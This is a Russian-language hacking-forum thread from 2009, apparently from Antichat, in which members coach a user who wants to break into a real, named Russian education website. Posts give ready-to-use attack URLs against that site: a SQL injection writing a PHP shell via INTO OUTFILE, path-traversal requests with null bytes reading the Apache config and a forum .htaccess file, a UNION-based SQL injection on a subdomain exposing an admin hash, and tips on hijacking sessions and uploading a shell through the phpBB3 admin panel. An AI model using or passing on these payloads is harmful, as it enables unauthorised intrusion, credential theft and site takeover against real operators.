 |
|
18.06.2009, 13:31
|
|
Banned
Регистрация: 16.06.2009
Сообщений: 5
С нами:
8896646
Репутация:
-51
|
|
Сообщение от Fuckel
попробуй INTO OUTFILE и ищи папку с правами на запись
подскадите как составить запрос на запись файла.
|
|
|
18.06.2009, 13:36
|
|
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
С нами:
9640431
Репутация:
105
|
|
например:
http://egechita.ru/news/show_news.php?id_news=-1+UNION+SELECT+1,2,3,4,5+INTO+OUTFILE+'/tmp/shell.php'+--+
мб пригодится
http://egechita.ru/documents/show_doc.php?doc=../../../../../../../../etc/httpd/conf/httpd.conf
|
|
|
|
18.06.2009, 13:41
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Fuckel
Я вот одного не пойму, зачем советовать то, что не будет работать?
Для записи в файл нужны права, а там их нет у юзера
Скорпиончик Сначала нужно почитать что-то , а потом по прочтению задавать вопросы. Статей куча на форуме
|
|
|
|
18.06.2009, 13:48
|
|
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
С нами:
9640431
Репутация:
105
|
|
я посоветовал ему попробывать, не утверждал что будет работать
|
|
|
|
18.06.2009, 15:05
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от Скорпиончик
Можно ли залить shell сюда?
http://egechita.ru/documents/show_doc.php?doc=68&type=federalsfhjdgj
2 вопрос
/home/www/egechita/documents/show_doc.php
вот структура сайта.
Что я могу ещё полезного вытащить кроме етк/пасс?
сервер *nix
Можно получить доступ к приватной инфо, кое-что почитать и прочитав нужное сделать таки своё грязное дело 
Код:
http://egechita.ru/documents/show_doc.php?doc=68&type=../../../../../home/www/egechita/forum/.htaccess%00
плюс там есть сессии в куках, зарегится везде, где только можно, выкупить путь хранения сессий и посмотреть, что выдаст
там кстати PHPBB3, шелл там льется элементарно, если попасть в админку
ЗЫЖ А можно поискать логи и не париться
Последний раз редактировалось Pashkela; 18.06.2009 в 15:16..
|
|
|
|
18.06.2009, 16:28
|
|
Banned
Регистрация: 16.06.2009
Сообщений: 5
С нами:
8896646
Репутация:
-51
|
|
спс, может ктонить знает какиенить эксплоиты для phpbb3. Подскажите плиз.
какиенибудь ссылки. Уж очень хочиться проникнуть в серв.
|
|
|
|
18.06.2009, 16:33
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
https://forum.antichat.ru/thread24488.html
|
|
|
|
18.06.2009, 18:23
|
|
Познающий
Регистрация: 03.06.2007
Сообщений: 44
С нами:
9968047
Репутация:
48
|
|
2 Скорпиончик
http://egechita.ru/documents/show_doc.php?doc=68&type=../../../../../etc/httpd/conf/httpd.conf%00
Конфиг апача. Видим что есть еще два хоста temp.egechita.ru и online.egechita.ru
смотрим online.egechita.ru и видим
http://online.egechita.ru/?theme=-7+union+select+1,2,3,4,5--
SQL injection
Хеш админа форума доступен
|
|
|
|
18.06.2009, 23:44
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Какие системные и *несистемные* таблицы есть в PostgreSql ? information_schema там вообще нету
|
|
|
|
18.06.2009, 23:50
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от Велемир
Какие системные и *несистемные* таблицы есть в PostgreSql ? information_schema там вообще нету
http://www.postgresql.org/docs/8.3/static/catalogs.html
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 105 (пользователей: 0 , гостей: 105)
|
|
|
|
Похожие темы
Линейный вид
